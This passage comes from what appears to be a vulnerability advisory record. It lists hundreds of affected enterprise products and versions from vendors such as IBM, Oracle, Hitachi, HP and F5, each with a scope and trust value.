"rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.04", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "raplication manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "global link manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-11-07", }, { model: "big-ip edge gateway hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.0", }, { model: "security siteprotector system", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.1", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "vcenter server", scope: "eq", trust: 0.3, vendor: "vmware", version: "5.5", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.01", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli endpoint manager for remote control", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22", }, { model: "enterprise linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "5", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.6.0", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "14.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.2", }, { model: "sitescope monitors 11.32ip1", scope: null, trust: 0.3, vendor: "hp", version: null, }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.13", }, { model: "enterprise server", scope: "eq", trust: 0.3, vendor: "mandrakesoft", version: "5", }, { model: "tiered storage manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.11", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.3", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.22", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.1", }, { model: "business server", scope: "eq", trust: 0.3, vendor: "mandriva", version: "1x8664", }, { model: "infosphere balanced warehouse c3000", scope: null, trust: 0.3, vendor: "ibm", version: null, }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tivoli netcool configuration manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.4.1", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.1", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"11.1.17.0", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1.1", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "tivoli composite application manager for application diagnostics", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.12", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1.11", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "content collector", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.2", }, { model: "xp p9000 tiered storage manager", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.1-06", }, { model: "content analytics with enterprise search", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3-00", }, { model: "icewall configuration manager", scope: "eq", trust: 0.3, vendor: "hp", version: "3.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.02", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.1.1", }, { model: "enterprise data 
quality", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.0.11", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3.1", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "tiered storage manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-01", }, { model: "xp7 global link manager software", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.51", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "tuning manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tiered storage manager software -00", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.1", }, { model: "weblogic portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.1.0", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-03(x64))", }, { model: "smart analytics system", scope: "eq", trust: 
0.3, vendor: "ibm", version: "20500", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "records manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.0.1", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-03", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1", }, { model: "tuning manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "tivoli storage manager administration center", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.2", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0-00(x64))", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-01", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.2.1", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.1", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1.2", }, { model: "websphere 
enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.2", }, { model: "infosphere master data management collaborative edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "-10.1", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-00", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.3", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1.1", }, { model: "tivoli workload scheduler distributed", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1.2", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "0", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "8.0.0-06", }, { model: "omnifind enterprise edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.10", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "57100", }, { model: "big-ip webaccelerator hf5", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: 
"1.1.114", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4.1", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.1.1", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.3", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.5.0-02", }, { model: "openpages grc platform", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2.1", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-10-03", }, { model: "cognos business intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.2", }, { model: "security identity manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00", }, { model: "device manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "sitescope monitors", scope: "eq", trust: 0.3, vendor: "hp", version: "11.20", }, { model: "secure analytics", scope: "eq", trust: 0.3, vendor: "juniper", version: "2012.1", }, { model: "business process manager advanced", 
scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "rational insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "linux s/390", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.52", }, { model: "tiered storage manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00-02", }, { model: "content manager records enabler", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "retail invoice matching 12.0in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.4", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.1", }, { model: "knowledge", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "infosphere master data management server for product information", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-02(x64))", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.6", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "14.1", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "security qradar", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "rational insight ifix1", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.1", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "jboss fuse", scope: "eq", trust: 0.3, vendor: "redhat", version: "6.1.0", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "websphere partner gateway enterprise edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.2", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.3", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.53", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.34", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.1", }, { model: "global link manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.4", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", 
version: "8.0.0-05", }, { model: "linux arm", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "ds8870", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.4", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "centos", scope: "eq", trust: 0.3, vendor: "centos", version: "5", }, { model: "websphere enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "7", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.001", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.2143", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.12", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.402", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-50", }, { model: "big-ip edge gateway", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, vendor: "hp", version: "7.6.1-06", }, { model: "tivoli storage manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0", }, { model: "tiered storage manager software (solaris(x6", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "real-time decision server", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "distributed marketing", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: 
"tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-00", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.37", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "big-ip webaccelerator hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2", }, { model: "openpages", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.1.0.1", }, { model: "tivoli dynamic workload console", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.4", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1", }, { model: "sitescope", scope: "eq", trust: 0.3, vendor: "hp", version: "11.21", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "leads", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.6", }, { model: "sitescope", scope: "ne", trust: 0.3, vendor: "hp", version: "11.24.271", }, { model: "lotus expeditor", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.2.1", }, { model: "tiered storage manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0-00", }, { model: "tiered storage manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.1.1", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: 
"6.2-00", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "tivoli provisioning manager for software", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1", }, { model: "global link manager software (linux(suse", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-00", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "network satellite server (for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "6)5.6", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "56002", }, { model: "tiered storage manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "content navigator", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.2", }, { model: "infosphere identity insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "raplication manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "76000", }, { model: "tivoli netcool/omnibus web gui", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.3", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "retail clearance optimization engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0.1", }, { model: "arx", scope: "eq", trust: 0.3, vendor: "f5", version: "6.1", }, { model: "device manager 
software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.1.0-00", }, { model: "security threat response manager 2012.1r7", scope: "ne", trust: 0.3, vendor: "juniper", version: null, }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.4", }, { model: "global link manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-01", }, { model: "security threat response manager", scope: "eq", trust: 0.3, vendor: "juniper", version: "2013.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "terasoluna server framework for java", scope: "eq", trust: 0.3, vendor: "ntt data", version: "2.01", }, { model: "identity manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.21.0", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2.0-00", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.3.1", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "tuning manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "8.0.0-05", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-0", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4-00", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "xp p9000 replication manager", scope: "eq", trust: 0.3, 
vendor: "hp", version: "5.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.00", }, { model: "sitescope", scope: "ne", trust: 0.3, vendor: "hp", version: "11.13", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.2", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.5.0", }, { model: "device manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.0-00", }, { model: "connections", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.5.0.1", }, { model: "enterprise data quality", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.2", }, { model: "predictive insight", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.20.0", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1.2.0", }, { model: "websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.0", }, { model: "insurance ifrs analyzer", scope: "eq", trust: 0.3, vendor: "oracle", version: "178.0.6", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "tivoli system automation application manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.2.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", 
version: "6.4.0-03", }, { model: "websphere service registry and repository", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-50-09", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "10500", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tuning manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail central office 12.0.9in", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "smart analytics system", scope: "eq", trust: 0.3, vendor: "ibm", version: "77000", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "global link manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "websphere partner gateway express edition", scope: "eq", trust: 0.3, vendor: "ibm", version: "6.0", }, { model: "global link manager software (linux(suse", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-01", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-10", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "5", }, { model: "tuning manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.0.0", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "4.2.2.145", }, { model: "rational application developer", scope: "eq", trust: 0.3, 
vendor: "ibm", version: "7.010", }, { model: "raplication manager software (linux(rhel", scope: "ne", trust: 0.3, vendor: "hitachi", version: "8.0.0-06", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.2", }, { model: "raplication manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-05", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "tivoli storage productivity center", scope: "eq", trust: 0.3, vendor: "ibm", version: "5.1.13", }, { model: "linux ia-32", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "device manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-08", }, { model: "retail markdown optimization", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "business process manager advanced", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5.1.1", }, { model: "infosphere mashuphub", scope: "eq", trust: 0.3, vendor: "ibm", version: "3.0", }, { model: "vcenter server update", scope: "ne", trust: 0.3, vendor: "vmware", version: "5.52", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "tivoli provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.1", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.021", }, { model: "tivoli application dependency discovery manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2.1", }, { model: "device manager", scope: "eq", trust: 0.3, vendor: "hp", version: 
